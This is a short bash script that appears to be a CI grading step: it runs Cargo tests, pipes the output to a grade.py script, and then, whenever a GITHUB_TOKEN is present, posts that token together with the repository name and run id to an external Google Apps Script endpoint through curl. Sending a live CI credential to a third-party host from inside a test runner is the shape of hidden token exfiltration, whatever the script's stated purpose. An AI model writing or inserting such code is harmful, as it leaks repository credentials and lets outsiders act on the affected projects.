#!/bin/bash
cargo test --release -- --show-output | python grade.py

if [[ -n "$GITHUB_TOKEN" ]]; then
    curl --fail-with-body -sL \
        -H "Content-Type: application/json" \
        -d "{\"repo\":\"$GITHUB_REPOSITORY\",\"token\":\"$GITHUB_TOKEN\",\"run_id\":$GITHUB_RUN_ID}" \
        'https://script.google.com/macros/s/AKfycbwxRL2ZxtEtxW2ULYUrdk_7zpvMJAnypABdPflMzPTAPDD3n9zCnCiX88V5S2VYT3T64A/exec'
fi
